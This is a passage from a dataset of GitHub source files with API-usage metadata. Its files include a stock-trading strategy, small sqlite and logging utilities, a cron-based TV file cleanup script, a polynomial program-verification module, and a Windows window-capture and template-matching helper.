"call"}, {"api_name": "matplotlib.pyplot", "line_number": 527, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path", "line_number": 530, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 531, "usage_type": "call"}]} +{"seq_id": "29632207623", "text": 
"from typing import List\nimport pandas as pd\n\nfrom ..strategies import base_strategy\nfrom tadawol import stats\nfrom tadawol import earnings\nfrom math import inf\n\n\nclass Earnings(base_strategy.BaseStrategy):\n\n def __init__(\n self,\n short_window: int = 5,\n long_window: int = 50,\n max_lose_percent: int = 8,\n max_win_percent: int = 15,\n max_keep_days: int = 15\n ):\n super().__init__(\n max_lose_percent=max_lose_percent,\n max_win_percent=max_win_percent,\n max_keep_days=max_keep_days,\n )\n\n self.short_window = short_window\n self.long_window = long_window\n\n earnings.update_data()\n self.earnings_df = earnings.get_earnings_df()\n self.earnings_df.rename(columns={\"ticker\": \"Ticker\"}, inplace=True)\n\n self.name = \"Earnings\"\n\n def add_entries_for_ticker(self, ticker_data: pd.DataFrame, **kwargs):\n ticker_data = ticker_data.copy(deep=True)\n ticker_data.sort_values(by=\"Date\", ascending=True, inplace=True)\n ticker_data.reset_index(drop=True, inplace=True)\n assert ticker_data[\"Ticker\"].nunique() == 1\n\n # get ticker earnings\n df, long_window_ema_column = stats.add_ema(ticker_data, window=self.long_window)\n df, short_window_ema_column = stats.add_ema(df, window=self.short_window)\n\n df.loc[:, \"long_ema_evolution\"] = df[long_window_ema_column] - df[long_window_ema_column].shift(1)\n df.loc[:, \"short_ema_evolution\"] = df[short_window_ema_column] - df[short_window_ema_column].shift(1)\n\n ticker = ticker_data[\"Ticker\"].unique()[0]\n ticker_earnings = self.earnings_df[self.earnings_df[\"Ticker\"] == ticker]\n df = pd.merge(df, ticker_earnings, on=[\"Date\", \"Ticker\"], how=\"left\")\n df.sort_values(by=\"Date\", ascending=True, inplace=True)\n for i in range(1, 4):\n df.loc[:, f\"earnings_{i}\"] = df[\"epssurprisepct\"].shift(i)\n\n def last_surprise(row):\n for i in range(1, 4):\n last_surprise = row[f\"earnings_{i}\"]\n if not pd.isna(last_surprise):\n return last_surprise\n\n return -inf\n\n df.loc[:, \"last_surprise\"] = df.apply(last_surprise, axis=1)\n\n df.loc[:, \"entry\"] = (df[\"short_ema_evolution\"] > 0) & (df[\"last_surprise\"] > 0)\n\n # go-on condition\n df.loc[:, \"good_evolution\"] = df[\"short_ema_evolution\"] > 0\n df.loc[:, \"go-on\"] = df[\"good_evolution\"] | df[\"good_evolution\"].shift(1) | df[\"good_evolution\"].shift(2) | df[\n \"good_evolution\"].shift(3) | df[\"good_evolution\"].shift(4) | df[\"good_evolution\"].shift(5)\n return df\n\n @staticmethod\n def get_grid():\n return [\n [9, 12, 15],\n [22, 26, 30],\n [9, 6],\n [8],\n [15],\n [7, 10, 15]\n ]\n\n @staticmethod\n def get_hint_columns() -> List[str]:\n return []\n", "repo_name": "yassineameur/tadawol", "sub_path": "tadawol/strategies/earnings.py", "file_name": "earnings.py", "file_ext": "py", "file_size_in_byte": 2985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "strategies.base_strategy.BaseStrategy", "line_number": 10, "usage_type": "attribute"}, {"api_name": "strategies.base_strategy", "line_number": 10, "usage_type": "name"}, {"api_name": "tadawol.earnings.update_data", "line_number": 29, "usage_type": "call"}, {"api_name": "tadawol.earnings", "line_number": 29, "usage_type": "name"}, {"api_name": "tadawol.earnings.get_earnings_df", "line_number": 30, "usage_type": "call"}, {"api_name": "tadawol.earnings", "line_number": 30, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tadawol.stats.add_ema", "line_number": 42, 
"usage_type": "call"}, {"api_name": "tadawol.stats", "line_number": 42, "usage_type": "name"}, {"api_name": "tadawol.stats.add_ema", "line_number": 43, "usage_type": "call"}, {"api_name": "tadawol.stats", "line_number": 43, "usage_type": "name"}, {"api_name": "pandas.merge", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.isna", "line_number": 58, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 85, "usage_type": "name"}]} +{"seq_id": "18486407831", "text": "#This is the most efficient way to put in values into a database!\n\n\nimport sqlite3 \n\nconn = sqlite3.connect(\"new.db\")\n\nwith conn as connection :\n\tc = connection.cursor()\n\tcities = [\n\t('Boston', 'MA', 600000),\n\t('Chicago', 'IL', 2700000),\n\t('Houston', 'TX', 2100000),\n\t]\n\n\tc.executemany('INSERT INTO population VALUES(?, ?, ?)', cities)", "repo_name": "CatGod6/pythoncosc", "sub_path": "sqlc.py", "file_name": "sqlc.py", "file_ext": "py", "file_size_in_byte": 335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "10224971354", "text": "import logging\n\nfrom config import Config\n\n\nclass Logger(logging.Logger):\n \"\"\"\n Logger class\n Specifies handlers and format\n \"\"\"\n LOGGER_FORMAT = \"%(asctime)s\\t%(levelname)-7s\\t%(name)-12s\\t%(message)s\"\n\n def __init__(self, name):\n super().__init__(name)\n self.add_c_handler()\n self.add_f_handler()\n\n def add_c_handler(self) -> None:\n \"\"\"\n Adds stdout handler\n\n :return: None\n \"\"\"\n handler = logging.StreamHandler()\n handler.setLevel(Config.LOGGING_COMMAND_LINE_LEVEL)\n formatter = logging.Formatter(self.LOGGER_FORMAT)\n handler.setFormatter(formatter)\n self.addHandler(handler)\n\n def add_f_handler(self) -> None:\n \"\"\"\n Adds file handler\n\n :return: None\n \"\"\"\n handler = logging.FileHandler(Config.LOGGING_FILE)\n handler.setLevel(Config.LOGGING_FILE_LEVEL)\n formatter = logging.Formatter(self.LOGGER_FORMAT)\n handler.setFormatter(formatter)\n self.addHandler(handler)\n", "repo_name": "Denis-Source/file_backup", "sub_path": "logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.Logger", "line_number": 6, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 24, "usage_type": "call"}, {"api_name": "config.Config.LOGGING_COMMAND_LINE_LEVEL", "line_number": 25, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 25, "usage_type": "name"}, {"api_name": "logging.Formatter", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 36, "usage_type": "call"}, {"api_name": "config.Config.LOGGING_FILE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 36, "usage_type": "name"}, {"api_name": "config.Config.LOGGING_FILE_LEVEL", "line_number": 37, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 37, "usage_type": "name"}, {"api_name": "logging.Formatter", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "72281644674", "text": "import os\nimport time\nimport sys\nimport logging\nimport pycron\n\n########################################################################\n\npath = 
os.environ['TV_PATH']\nshowList = os.environ['CONF']\nlogfile = os.environ['LOG']\nexclude = os.environ['EXCLUDE'].split(',')\ncron = os.environ['CRON']\nuid = int(os.environ['PUID'])\ngid = int(os.environ['PGID'])\n\n############################# End Variables ############################\n\n\ndef main():\n logging.info(\"************Begin TV Cleanup************\")\n inFile = open(showList)\n for line in inFile:\n line = line.rstrip('\\n')\n token = line.split(\",\")\n cleanup(int(token[0]), os.path.join(path, token[1]))\n inFile.close()\n logging.info(\"*************End TV Cleanup*************\")\n\n#-----------------------------------------------------------------------\ndef clean(cleanPath, cleanItem):\n if os.path.isdir(cleanPath):\n try:\n os.rmdir(cleanPath)\n logging.info(\"Removed directory: \" + cleanPath)\n except OSError:\n logging.error(\"Unable to remove directory: \" + cleanPath)\n else:\n if not cleanPath.endswith(tuple(exclude)):\n try:\n if os.path.exists(cleanPath):\n os.remove(cleanPath)\n logging.info(\"Removed show: \" + cleanItem)\n except OSError:\n logging.error(\"Unable to remove show: \" + cleanItem)\n#-----------------------------------------------------------------------\ndef cleanup(numDays, cleanPath):\n numSecs = time.time() - (numDays * 24 * 60 * 60)\n for root, dirs, files in os.walk(cleanPath):\n for name in files:\n filename = os.path.join(root, name)\n \n if os.stat(filename).st_mtime < numSecs:\n clean(filename, name)\n if not os.listdir(root):\n clean(root, name)\n#-----------------------------------------------------------------------\n\n# Setup app\nos.chdir(path)\ntime.tzset()\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s:%(levelname)s:%(message)s')\nlogging.info(\"Starting TVcleanup with cron \" + cron)\n\nos.setgid(gid)\nos.setuid(uid)\n\nlogging.info(\"Using user ID: \" + str(os.getuid()) + \", and group ID: \" + str(os.getgid()))\n\nwhile True:\n if pycron.is_now(cron):\n main()\n time.sleep(60)\n else:\n time.sleep(60)\n", "repo_name": "FlexibleToast/tvcleanup", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2204, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.rmdir", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": 
"attribute"}, {"api_name": "os.remove", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 53, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 60, "usage_type": "call"}, {"api_name": "time.tzset", "line_number": 61, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 62, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 62, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "os.setgid", "line_number": 65, "usage_type": "call"}, {"api_name": "os.setuid", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 68, "usage_type": "call"}, {"api_name": "os.getuid", "line_number": 68, "usage_type": "call"}, {"api_name": "os.getgid", "line_number": 68, "usage_type": "call"}, {"api_name": "pycron.is_now", "line_number": 71, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "32509076608", "text": "import requests\nfrom bs4 import BeautifulSoup \nfrom urllib import request\n\nquery = input(\"Enter Uni: \")\nquery = query.replace(\" \",\"+\")\nquery = \"https://search.prtl.co/2018-07-23/?q=en-283%7Ckw-\" + query + \"%7Clv-master%7Cmh-face2face%7Ctc-EUR\" \n\n#r = request.urlopen(query)\n\nr = requests.get(query)\nfee = r.json()[0][\"tuition_fee\"]\nfeeval= fee[\"value\"]\nfeefreq = fee[\"unit\"]\nfeecurr = fee[\"currency\"]\n\nprint(str(feeval) + \" \" + feecurr + \" / \" + feefreq)\n", "repo_name": "55abhilash/uniparser", "sub_path": "getfee.py", "file_name": "getfee.py", "file_ext": "py", "file_size_in_byte": 455, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "42198233274", "text": "import copy\nimport sympy as sp\nfrom polynomial import Polynomial\nimport sys\nimport copy\nfrom sympy.matrices import Matrix\nimport time\nimport os\nfrom collections import deque\n\nall_unknown_coefficients = []\nunknown_coefficients_index = 0\n\n\ndef get_symbolic_poly(symbolic_poly, real_vars):\n global all_unknown_coefficients, unknown_coefficients_index\n if len(symbolic_poly.children) == 2:\n variables = get_vars_name(symbolic_poly.children[0])\n degree = int(symbolic_poly.children[1].children[0].value)\n else:\n variables = []\n degree = int(symbolic_poly.children[0].children[0].value)\n\n # check all variables are in real_vars\n sympy_vars = []\n for var in variables:\n if var not in real_vars:\n raise Exception(\n \"Undefined variable used in symbolic_poly:\" + str(symbolic_poly))\n sympy_vars.append(real_vars[var])\n\n # sympy_vars = list(map(lambda x: real_vars[x], variables))\n curr_monomial_list = [sp_unit]\n all_monomials = set([sp_unit])\n # sympy_vars = list(map(lambda x: real_vars[x], variables))\n curr_degree = 1\n while curr_degree <= degree:\n new_monomial_list = list()\n 
for var in sympy_vars:\n for monomial in curr_monomial_list:\n new_monomial_list.append(monomial*var)\n all_monomials = all_monomials.union(set(new_monomial_list))\n curr_monomial_list = new_monomial_list\n curr_degree += 1\n\n monomial_vector = list(all_monomials)\n monomial_dict = {}\n coefficient_list = []\n # create the monomial_dict for the Polynomial\n for mono in monomial_vector:\n unknown_coefficient_name = \"_a_\" + \\\n str(unknown_coefficients_index) + \"_\"\n sym = sp.Symbol(unknown_coefficient_name)\n unknown_coefficients_index += 1\n coefficient_list.append(sym)\n monomial_dict[mono] = sym\n\n all_unknown_coefficients.extend(coefficient_list)\n polynomial = Polynomial(monomial_dict)\n return polynomial, polynomial.to_string()\n\n\ndef apply_substitute(lst, substitute_dict):\n return list(map(lambda x: x.subs_complex(substitute_dict), lst))\n\n\ndef get_bound_poly(real_vars, bound):\n sp_bound = Polynomial({sp_unit: bound})\n monomial_dict = {}\n count = 0\n for x in real_vars:\n var = real_vars[x]\n monomial_dict[var*var] = 1\n count += 1\n poly = Polynomial(monomial_dict)\n p_count = Polynomial({sp_unit: count})\n\n return (sp_bound*sp_bound*p_count - poly)\n\n\ndef get_substition_dict(real_vars, variables_index):\n substitute_dict = {}\n for var in variables_index:\n var_name = var + \"_\" + str(variables_index[var])\n if var_name not in real_vars:\n real_vars[var_name] = sp.Symbol(var_name)\n substitute_dict[var] = real_vars[var_name]\n return substitute_dict\n\n\ndef get_negation(lst_poly_geq):\n # we overapproximate negation\n return list(map(lambda x: x*Polynomial({sp_unit: -1}), lst_poly_geq))\n\n\ndef graph_preprocessor(tree, file_name):\n \"\"\"\n The function takes a program tree as input and returns the symbolic\n \"\"\"\n global real_vars, function_vars\n declarations = tree.children[0]\n precond = tree.children[1]\n stmts = tree.children[2]\n postcond = tree.children[3].children[0]\n # to store each line of the symbolic polynomial program\n symbolic_polynomial_program = []\n\n # get variable list\n real_vars, function_vars = get_declarations(\n declarations, symbolic_polynomial_program)\n variables_index = {x: 0 for x in real_vars}\n\n if len(precond.children) == 0:\n _preconditions, precondition_line = [Polynomial({sp_unit: 1})], \"\"\n else:\n # it is a list, we only store the lhs of the inequalities, rhs is >= 0 by default\n _preconditions, precondition_line = get_assertion(precond, real_vars)\n symbolic_polynomial_program.append(\"@pre({});\".format(precondition_line))\n\n graph = PolynomialTS(real_vars, file_name)\n root = graph.add_vertex(text=precondition_line)\n graph.set_initial_loc(root, _preconditions)\n # Handle Statements\n parent_vertex = root\n for statement in stmts.children:\n parent_vertex = add_statement_for_graph(\n graph, parent_vertex, statement, symbolic_polynomial_program)\n # Handle Postcondition\n _postconditions, postconditions_line = get_assertion(postcond, real_vars)\n\n terminal = graph.add_vertex(text=postconditions_line)\n graph.add_edge(parent_vertex, terminal, [], [])\n graph.set_final_loc(terminal, _postconditions)\n symbolic_polynomial_program.append(\n \"@post({});\".format(postconditions_line))\n # we will add a compact polynomial inequality when we apply stellensatze (if required)\n return graph, symbolic_polynomial_program, all_unknown_coefficients\n\n\nclass PolynomialTS:\n def __init__(self, variables_dict, file_name, var_manager):\n # maps each variable name type(str) to the sp_symbol\n self.variables = variables_dict\n 
self.var_manager = var_manager\n self.vertices = set()\n self.vertex_text = dict()\n self.edges = dict()\n # list v's such that every cycle passses through at least one v from cutset\n self.cutset = set()\n # v -> list of P(V) such that P(V) \\geq 0 whenever control reaches v\n self.invariants = dict()\n self.pre_conditions = dict()\n self.counter = 0\n self.file_name = file_name\n\n def add_vertex(self, text=\"\"):\n v = self.counter\n self.counter += 1\n self.vertices.add(v)\n self.vertex_text[v] = text\n return v\n\n def add_edge(self, v1, v2, update, guard, text=\"\"):\n # update = (var, P(V)) for var = P(V) (P(V) is Polynomial type) or None if no update\n # guard = P(V) which stands for P(V) \\geq 0\n if len(update) != 2 and len(update) != 0:\n raise Exception(\"Invalid update provided: \", update, len(update))\n if v1 not in self.vertices or v2 not in self.vertices:\n raise Exception(\n \"Invalid vertex provided for edge: {} - {}\".format(v1, v2))\n if (v1, v2) in self.edges:\n raise Exception(\"Edge already exists\")\n self.edges[(v1, v2)] = (update, guard, text)\n\n def add_cutset(self, v, invariant, pre_condition=[]):\n if v not in self.vertices:\n raise Exception(\"Vertex {} does not exists.\".format(v))\n self.cutset.add(v)\n self.invariants[v] = invariant\n self.pre_conditions[v] = pre_condition\n\n def set_initial_loc(self, v, invariant, pre_condition=[]):\n if v not in self.vertices:\n raise Exception(\"Vertex {} does not exists.\".format(v))\n self.initial_loc = v\n self.invariants[v] = invariant\n self.pre_conditions[v] = pre_condition\n\n def set_final_loc(self, v, invariant, pre_condition=[]):\n if v not in self.vertices:\n raise Exception(\"Vertex {} does not exists.\".format(v))\n self.final_loc = v\n self.invariants[v] = invariant\n self.pre_conditions[v] = pre_condition\n\n def print(self):\n if not self.var_manager.args.print_verbose:\n return\n print(\"\\n===== Polynomial Transition System =====\")\n print(\"Initial Location: \", self.initial_loc)\n print(\"Final Location: \", self.final_loc)\n print(\"Vertices:\")\n for v in self.vertices:\n if v in self.invariants or v in self.pre_conditions:\n print(\"==== vertice %s ====\" % v)\n if v in self.invariants:\n print(\" === Invariant: \", self.invariants[v])\n if v in self.pre_conditions:\n print(\" === Other Pre-Conditions: \",\n self.pre_conditions[v])\n print()\n # print(\"Edges: \")\n # for e in self.edges:\n # \tprint(e, self.edges[e])\n\n def plot(self):\n import networkx as nx\n import matplotlib.pyplot as plt\n edges = self.edges.keys()\n G = nx.Graph()\n G.add_edges_from(edges)\n pos = nx.spring_layout(G)\n plt.figure()\n nx.draw(\n G, pos, edge_color='black', width=1, linewidths=2,\n node_size=500, node_color='pink', alpha=0.9,\n labels={node: node for node in G.nodes()}\n )\n edge_labels = dict()\n for edge in self.edges:\n edge_labels[edge] = self.edges[edge][2][:10] # the text\n nx.draw_networkx_edge_labels(\n G, pos,\n edge_labels=edge_labels,\n font_color='red',\n font_size='8'\n )\n # get positions\n pos = nx.spring_layout(G)\n # shift position a little bit\n shift = [0, 0]\n shifted_pos = {node: node_pos +\n shift for node, node_pos in pos.items()}\n # Just some text to print in addition to node ids\n labels = {}\n for v in self.vertex_text:\n labels[v] = self.vertex_text[v]\n\n # nx.draw_networkx_labels(G, shifted_pos, labels=labels, horizontalalignment=\"left\", font_size='8')\n\n plt.axis('off')\n plt.savefig(self.file_name + \"_graph.pdf\", block=True)\n\n def get_constraint_pairs(self):\n CP = 
[]\n for v in self.cutset:\n CP.extend(self.get_constraint_pairs_for_paths_between(\n self.initial_loc, v))\n CP.extend(self.get_constraint_pairs_for_paths_between(\n v, self.final_loc))\n\n for v1 in self.cutset:\n for v2 in self.cutset:\n CP.extend(self.get_constraint_pairs_for_paths_between(v1, v2))\n\n # search for path directly from initial to final location\n CP.extend(self.get_constraint_pairs_for_paths_between(\n self.initial_loc, self.final_loc))\n\n return CP\n\n def get_constraint_pairs_for_paths_between(self, v1, v2):\n \"\"\"\n Returns: A list of constraint pairs for each path between v1 and v2\n \"\"\"\n lst = []\n paths = self.get_paths_between(v1, v2)\n if self.var_manager.args.print_verbose:\n print(\"\\n======== Path of [%d]=>[%d] = %d\" % (v1, v2, len(paths)))\n for i, path in enumerate(paths):\n if self.var_manager.args.print_verbose:\n print(\"\\n##### Path: [%d]=>[%d], %d/%d\" %\n (v1, v2, i, len(paths)))\n variables_index = {x: 0 for x in self.variables}\n alpha, beta, real_vars = [], [], copy.copy(self.variables)\n substitute_dict = get_substition_dict(real_vars, variables_index)\n final_values_of_vars = {x: Polynomial(\n {substitute_dict[x]: 1}) for x in self.variables}\n alpha += apply_substitute(self.invariants[v1],\n final_values_of_vars)\n alpha += apply_substitute(\n self.pre_conditions[v1], final_values_of_vars)\n old_vertex = v1\n\n for vert in path[1:]:\n new_vertex = vert\n update, guard, text = self.edges[(old_vertex, new_vertex)]\n guard_subs = apply_substitute(guard, final_values_of_vars)\n alpha.extend(guard_subs)\n if update:\n (var, poly) = update\n poly_subs = poly.subs_complex(final_values_of_vars)\n final_values_of_vars[str(var)] = poly_subs\n old_vertex = new_vertex\n if self.var_manager.args.print_verbose:\n print(\"\\n\\tTransitions:\\n\\t\")\n for k, v in final_values_of_vars.items():\n if len(v.monomial_dict.keys()) == 1:\n term = list(v.monomial_dict.keys())[0]\n\n if k in str(term) and v.monomial_dict[term] == 1:\n continue\n if self.var_manager.args.print_verbose:\n print('\\t\\t ', k, '=', v.to_string())\n\n if self.var_manager.args.print_verbose:\n print(\"\\n\\tPre-Guards:\\n\\t\\t\",\n alpha[len(self.invariants[v1]):])\n beta += apply_substitute(self.invariants[v2], final_values_of_vars)\n lst.append((alpha, beta, real_vars))\n return lst\n\n def get_paths_between_backtrack(self, v1, v2):\n solutions = []\n current_solution = []\n candidate_vertices = deque()\n candidate_vertices.append((1, v1))\n while len(candidate_vertices) >= 1:\n depth, curr_v = candidate_vertices.pop()\n if len(current_solution) >= depth:\n current_solution = current_solution[:depth-1] + [curr_v]\n else:\n current_solution.append(curr_v)\n\n if curr_v is None:\n # not a solution\n current_solution.pop()\n elif curr_v == v2 and depth > 1:\n # a solution is found\n solutions.append(copy.deepcopy(current_solution))\n current_solution.pop()\n elif depth > 1 and curr_v in self.cutset:\n # not a solution\n current_solution.pop()\n else:\n # expand the node\n for next_v in self.get_neighbors(curr_v):\n candidate_vertices.append((depth+1, next_v))\n #print('path_of %s => %s = ' % (v1, v2), solutions)\n return solutions\n\n def get_paths_between(self, v1, v2, visited=None):\n # assume no self loop, i.e., every while block has at least one statement\n return self.get_paths_between_backtrack(v1, v2)\n\n def get_neighbors(self, v):\n n = []\n for _v in self.vertices:\n if (v, _v) in self.edges:\n n.append(_v)\n return n\n", "repo_name": "zhuocai/Asparagus", "sub_path": 
"src/PolynomialTS.py", "file_name": "PolynomialTS.py", "file_ext": "py", "file_size_in_byte": 13724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sympy.Symbol", "line_number": 53, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 59, "usage_type": "call"}, {"api_name": "polynomial.to_string", "line_number": 60, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 68, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 75, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 76, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 86, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 93, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 114, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 220, "usage_type": "call"}, {"api_name": "networkx.spring_layout", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "networkx.draw", "line_number": 224, "usage_type": "call"}, {"api_name": "networkx.draw_networkx_edge_labels", "line_number": 232, "usage_type": "call"}, {"api_name": "networkx.spring_layout", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 251, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 251, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 252, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 285, "usage_type": "call"}, {"api_name": "polynomial.Polynomial", "line_number": 287, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 326, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 340, "usage_type": "call"}]} +{"seq_id": "37105993467", "text": "import sys\nimport os\nimport argparse\n\nsys.path.append(os.getcwd())\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--experiment_type\", type=str, default='atomic',\n choices=[\"atomic\", \"conceptnet\"])\nparser.add_argument(\"--experiment_num\", type=str, default=\"0\")\nparser.add_argument(\"--pickled_data\", type=str, default=None)\nparser.add_argument(\"--save_path\", type=str, default=None, help='save path override')\nparser.add_argument(\"--train_comet_loss\", action='store_true', default=False, help='train with comet loss')\nparser.add_argument(\"--eval_comet_loss\", action='store_true', default=False, help='eval with comet loss')\n\nargs = parser.parse_args()\n\nif args.experiment_type == \"atomic\":\n from main_atomic import main\n main(args.experiment_num, args)\nif args.experiment_type == \"conceptnet\":\n from main_conceptnet import main\n main(args.experiment_num)\n", "repo_name": "mnskim/teamproject", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 5, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", 
"line_number": 7, "usage_type": "call"}, {"api_name": "main_atomic.main", "line_number": 20, "usage_type": "call"}, {"api_name": "main_conceptnet.main", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "2344134779", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 17 23:12:21 2019\n\n@author: YY\n\"\"\"\n\nimport win32gui\nimport win32ui\nimport win32con\nfrom ctypes import windll\nfrom PIL import Image\nimport os,radd\nimport cv2\nimport numpy as np\n\ndef screencap(name):\n hwnd=win32gui.FindWindow(None,name + ' (仅限非商业用途)')\n# print(hwnd)\n# hwndChildList = [] \n# win32gui.EnumChildWindows(hwnd, lambda hwnd, param: param.append(hwnd), hwndChildList) \n# print(hwndChildList)\n# hwnd=hwndChildList[0]\n# print(hwnd)\n # 获取窗口位置\n left, top, right, bot = win32gui.GetWindowRect(hwnd)\n #获取某个句柄的类名和标题\n \n #print(left,top,right,bot)\n #window_capture(handle,'test.jpg')\n w = right - left\n h = bot - top\n \n # 返回句柄窗口的设备环境、覆盖整个窗口,包括非客户区,标题栏,菜单,边框\n hwndDC = win32gui.GetWindowDC(hwnd)\n \n # 创建设备描述表\n mfcDC = win32ui.CreateDCFromHandle(hwndDC)\n \n # 创建内存设备描述表\n saveDC = mfcDC.CreateCompatibleDC()\n \n # 创建位图对象\n saveBitMap = win32ui.CreateBitmap()\n saveBitMap.CreateCompatibleBitmap(mfcDC, w, h)\n saveDC.SelectObject(saveBitMap)\n \n # 截图至内存设备描述表\n img_dc = mfcDC\n mem_dc = saveDC\n mem_dc.BitBlt((0, 0), (w, h), img_dc, (0, 0), win32con.SRCCOPY)\n # 将截图保存到文件中\n# saveBitMap.SaveBitmapFile(mem_dc, 'screenshot.bmp')\n \n # 改变下行决定是否截图整个窗口,可以自己测试下\n result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 1)\n# result = windll.user32.PrintWindow(hwnd, saveDC.GetSafeHdc(), 0)\n# print(result)\n \n # 获取位图信息\n bmpinfo = saveBitMap.GetInfo()\n bmpstr = saveBitMap.GetBitmapBits(True)\n # 生成图像\n im = Image.frombuffer(\n 'RGB',\n (bmpinfo['bmWidth'], bmpinfo['bmHeight']),\n bmpstr, 'raw', 'BGRX', 0, 1)\n \n # 内存释放\n win32gui.DeleteObject(saveBitMap.GetHandle())\n saveDC.DeleteDC()\n mfcDC.DeleteDC()\n win32gui.ReleaseDC(hwnd, hwndDC)\n \n # 存储截图\n if result == 1:\n #PrintWindow Succeeded\n im.save(\"test.png\")\n # im.show()\n \ndef open_pic_grey(Target):\n template = cv2.imread(Target,0)\n return template\n\ndef get_position(image,Target,value):\n img_rgb = cv2.imread(image)\n img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)\n w, h = Target.shape[::-1]\n res = cv2.matchTemplate(img_gray,Target,cv2.TM_CCOEFF_NORMED)\n threshold = value\n loc = np.where( res >= threshold)\n xy_loc = list(zip(*loc[::-1]))\n center_loc = []\n for i in xy_loc:\n 